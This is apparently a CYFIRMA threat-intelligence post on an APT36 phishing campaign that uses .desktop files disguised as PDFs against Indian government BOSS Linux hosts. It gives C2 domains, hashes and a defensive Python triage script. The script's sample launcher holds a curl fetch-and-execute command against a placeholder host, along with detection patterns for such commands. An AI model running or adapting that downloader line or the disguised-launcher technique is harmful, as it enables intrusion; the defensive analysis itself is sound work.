CYFIRMA Research - APT36 Campaign Targets Indian Defense BOSS Linux Systems
Description
CYFIRMA has uncovered an ongoing cyber-espionage campaign orchestrated by APT36, a Pakistan-linked threat actor, targeting Indian Government entities.
Key Highlights:
- Initial Access: Spear-phishing emails delivering weaponized .desktop files disguised as PDFs.
- Target Platforms: Windows & Linux BOSS OS.
- Malware Behavior: Downloads & executes ELF payloads, establishes persistence via cron/systemd, and communicates with C2 servers (modgovindia[.]space, securestore[.]cv).
- Impact: Data exfiltration, sustained access, and evasion of security controls.
- Malware Identifiers: Meeting_Ltr_ID1543ops.pdf.desktop, Meeting_Ltr_ID1543ops.pdf-.elf (MD5: 10b7139952e3daae8f9d7ee407696ccf, 5bfeeae3cc9386513dc7c301c61e67a7).
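The weaponized-.desktop pattern in the highlights above lends itself to a simple triage check. As an added example (not CYFIRMA's code and not the campaign's artifacts), the script below parses a constructed .desktop launcher and flags the indicators the report describes: a document double extension, a hidden shell wrapper, a downloader in Exec, and a stage-to-/tmp-and-run sequence. The sample filename, hostname and command are placeholders.

```python
import configparser
import re

# Constructed sample, not a campaign artifact: a launcher whose filename and
# Name pose as a PDF while Exec pulls and runs a file from a placeholder host.
SAMPLE_FILENAME = "Invite_Ltr.pdf.desktop"
SAMPLE_CONTENT = """[Desktop Entry]
Type=Application
Name=Invite_Ltr.pdf
Icon=application-pdf
Terminal=false
Exec=bash -c "curl -fsSL http://placeholder.invalid/u -o /tmp/.u; chmod +x /tmp/.u; /tmp/.u"
"""

DOC_EXTS = (".pdf", ".doc", ".docx", ".xls", ".xlsx", ".ppt", ".pptx")
SHELL_WRAPPER = re.compile(r"^\s*(/bin/|/usr/bin/)?(ba|da|z)?sh\s+-c\b")
DOWNLOADER = re.compile(r"\b(curl|wget)\b")
DROP_AND_RUN = re.compile(r"(/tmp/|/dev/shm/|chmod\s+\+x)")


def triage_desktop(filename: str, content: str) -> list[str]:
    """Return the indicators matched by one .desktop file; an empty list means none."""
    # .desktop files are INI-like; '%u'-style field codes must not be interpolated.
    cp = configparser.ConfigParser(interpolation=None, strict=False)
    cp.read_string(content)
    if not cp.has_section("Desktop Entry"):
        return ["no [Desktop Entry] section: not a valid launcher"]
    entry = cp["Desktop Entry"]
    exec_cmd = entry.get("Exec", "")
    findings = []
    stem = filename[: -len(".desktop")] if filename.endswith(".desktop") else filename
    if stem.lower().endswith(DOC_EXTS):
        findings.append(f"double extension: '{filename}' poses as a document")
    if entry.get("Name", "").lower().endswith(DOC_EXTS):
        findings.append("Name field ends in a document extension")
    if SHELL_WRAPPER.search(exec_cmd):
        findings.append("Exec wraps a shell with -c instead of opening a document")
        # The spec defaults Terminal to false, so an absent key also hides the console.
        if entry.get("Terminal", "false").lower() == "false":
            findings.append("Terminal is false: the shell runs with no visible console")
    if DOWNLOADER.search(exec_cmd):
        findings.append("Exec calls a downloader (curl/wget)")
    if DROP_AND_RUN.search(exec_cmd):
        findings.append("Exec stages and executes a file from a world-writable path")
    return findings


if __name__ == "__main__":
    for finding in triage_desktop(SAMPLE_FILENAME, SAMPLE_CONTENT):
        print("[!]", finding)
```

Run it over ~/.config/autostart and ~/Desktop on a BOSS or other Linux host to surface launchers that warrant a closer look; any hit on a document-named .desktop file is worth an analyst's attention.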
This campaign reflects APT36's increasing sophistication: the malware is tailored to indigenous platforms such as BOSS Linux and built to maintain persistent, covert access to critical government infrastructure.
Organizations must stay vigilant, strengthen phishing defenses, and continuously monitor for malicious infrastructure and anomalous activity.
Link to the Research Report: https://www.cyfirma.com/research/apt36-targets-indian-boss-linux-systems-with-weaponized-autostart-files/
#CyberSecurity #ThreatIntel #APT36 #CyberEspionage #Linux #Windows #Phishing #CYFIRMA #CYFIRMAresearch #ExternalThreatLandscapeManagement #ETLM
https://www.cyfirma.com/